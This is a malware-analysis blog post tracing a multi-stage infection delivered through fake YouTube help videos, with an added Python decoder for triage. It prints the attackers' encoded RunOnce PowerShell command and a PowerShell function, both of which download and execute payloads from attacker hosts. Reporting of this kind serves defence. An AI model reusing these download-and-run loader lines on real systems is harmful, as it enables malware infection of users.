30.07.2024

Ongoing series: #1 #2 #3 #4 #5 #6

next youtube pc help update

After many file-sharing hosts blocked the files from youtube pc help #3, and many new YouTube videos were uploaded, here is the next part of the series. The criminals have moved from generic file hosts to Cloudflare, now hosting their malware themselves. All previously found videos have been updated, and the descriptions now link to their own domain. As before, this domain redirects visitors with residential IPs to a download. However, this download is now hosted directly on Cloudflare on another domain: download.geeksupps[.]com/webdav/reg/file/dl.php.

The Code (Stage 1)

The criminals now deliver a Tweak.reg file (SHA256: 28923F781C929115C6A1D8E776B020C1A27964F4A94A2A705910A56D7867465E) directly, unlike before. The file is again padded with junk, but regedit still processes it thanks to the .reg extension and the header Windows Registry Editor Version 5.00. The only value actually set is in the RunOnce key:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"MegaLIMLauncher"="pOwErsHELl -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA"

This Base64-encoded command runs once, at the next login. It downloads the next stage (SHA256: 2CD9C1315865F0A9A8DFE68F6FFFC6C1540A8FD6C573D12772C37531D4312CE2) from https://pwsh2.pajamas-stoic-failing[.]lol/webdav/reg/DonaldDuck and executes it via mshta.

The Not-So-Executable (Stage 2)

As previously described in youtube pc help #2 and youtube pc help #3, the downloaded file is an executable, but the relevant part is a JavaScript script encoded and hidden inside it. As before, several rounds of deobfuscation and decoding are needed to reach the layer of actual interest. For example, the PowerShell payload is AES-encrypted with the key 49594972696A6F7A574A594775414161 (hex) and an all-zero IV:

$oGLwg = [System.Security.Cryptography.Aes]::Create();
$oGLwg.Key = UubizRsX('49594972696A6F7A574A594775414161');   # hex string -> 16-byte AES key
$oGLwg.IV  = New-Object byte[] 16;                            # all-zero IV
$wAhZRwwS = $oGLwg.CreateDecryptor();
$DEfgAUHIW = $wAhZRwwS.TransformFinalBlock($prGtwv, 0, $prGtwv.Length);  # $prGtwv holds the ciphertext
$ZjHqoEPsc = [System.Text.Encoding]::Utf8.GetString($DEfgAUHIW);         # decrypted PowerShell source
$wAhZRwwS.Dispose();

The decrypted source contains four PowerShell functions that decode, download, and execute the next stage. If it is not already present, mms_mini.exe (SHA256: E11DC8D2E7FBA91857DF6A38C6E64AD491A9271B9F0BFDA937680DD0DA453665) is downloaded from the same folder as before, saved in the user's TEMP folder, and then executed:

function Mdr(){
    $kbx = $env:Temp + '\';
    $pRBSWprbzGM = $kbx + 'mms_mini.exe';
    if (Test-Path -Path $pRBSWprbzGM){
        rvQ $pRBSWprbzGM;                 # already dropped: just execute it
    }
    Else {
        # xiu/zmB turn the integer array into the download URL
        $MdSmylcFUAm = zmB (xiu @(3807,3819,3819,3815,3818,3761,3750,3750,3815,3822,3818,3807,3753,3749,3815,3800,3809,3800,3812,3800,3818,3748,3818,3819,3814,3808,3802,3748,3805,3800,3808,3811,3808,3813,3806,3749,3811,3814,3811,3750,3822,3804,3801,3803,3800,3821,3750,3817,3804,3806,3750,3812,3812,3818,3798,3812,3808,3813,3808,3749,3804,3823,3804));
        GKF $pRBSWprbzGM $MdSmylcFUAm;    # download to %TEMP%\mms_mini.exe
        rvQ $pRBSWprbzGM                  # execute
    };
}
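As an added triage example (not code from the original post or from the sample), the Python script below decodes the two obfuscation layers shown above: the UTF-16LE Base64 of the RunOnce value and the integer array handed to xiu() in Mdr(). Both inputs are copied from this page; that xiu() subtracts one fixed offset is an assumption, since the sample's helper bodies are not shown, and the script brute-forces that offset rather than hard-coding it.

```python
import base64

# Inputs copied from the page: the -enc argument of the RunOnce value and the
# integer array passed to xiu() in Mdr(). Both are the attacker's data as published.
RUNONCE_B64 = (
    "LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBw"
    "AGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwA"
    "bwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA"
)
XIU_ARRAY = [
    3807, 3819, 3819, 3815, 3818, 3761, 3750, 3750, 3815, 3822, 3818, 3807, 3753, 3749,
    3815, 3800, 3809, 3800, 3812, 3800, 3818, 3748, 3818, 3819, 3814, 3808, 3802, 3748,
    3805, 3800, 3808, 3811, 3808, 3813, 3806, 3749, 3811, 3814, 3811, 3750,
    3822, 3804, 3801, 3803, 3800, 3821, 3750, 3817, 3804, 3806, 3750,
    3812, 3812, 3818, 3798, 3812, 3808, 3813, 3808, 3749, 3804, 3823, 3804,
]


def decode_powershell_enc(b64: str) -> str:
    """powershell -enc takes Base64 over UTF-16LE text; a UTF-8 decode would not work."""
    return base64.b64decode(b64).decode("utf-16-le")


def decode_offset_array(values, marker="://"):
    """Assumption: xiu() subtracts one constant from every integer (its body is not
    on the page). Try every offset that maps all values into printable ASCII and
    return the first whose output contains the marker (this stage fetches a URL).
    Returns (offset, text), or (None, "") if no offset fits."""
    lo, hi = max(values) - 126, min(values) - 32
    for offset in range(lo, hi + 1):
        text = "".join(chr(v - offset) for v in values)
        if marker in text:
            return offset, text
    return None, ""


def defang(text: str) -> str:
    """Make recovered indicators safe to paste into a report."""
    return text.replace("http", "hxxp").replace(".", "[.]")


if __name__ == "__main__":
    print("RunOnce command:", defang(decode_powershell_enc(RUNONCE_B64)))
    offset, url = decode_offset_array(XIU_ARRAY)
    print(f"xiu() offset {offset}, next stage:", defang(url))
```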

The Dropper Payload (Stage 3)

This executable drops and executes several files on the system, including:

  • a legitimate AutoIT3.exe to execute an obfuscated script
  • the script Linda.bat (SHA256: C696C636CF51D283CD5EFA2AFD82345AD3CC2CA8C84074138FE57CD71C7055F4), obfuscated via Abobus
  • a compiled AutoIt file for the actual functionality: Grigori.a3x (SHA256: 24CF8C2860413DE82531F80A2F93920D6C682DC31312D888B2F128FC0190CA03)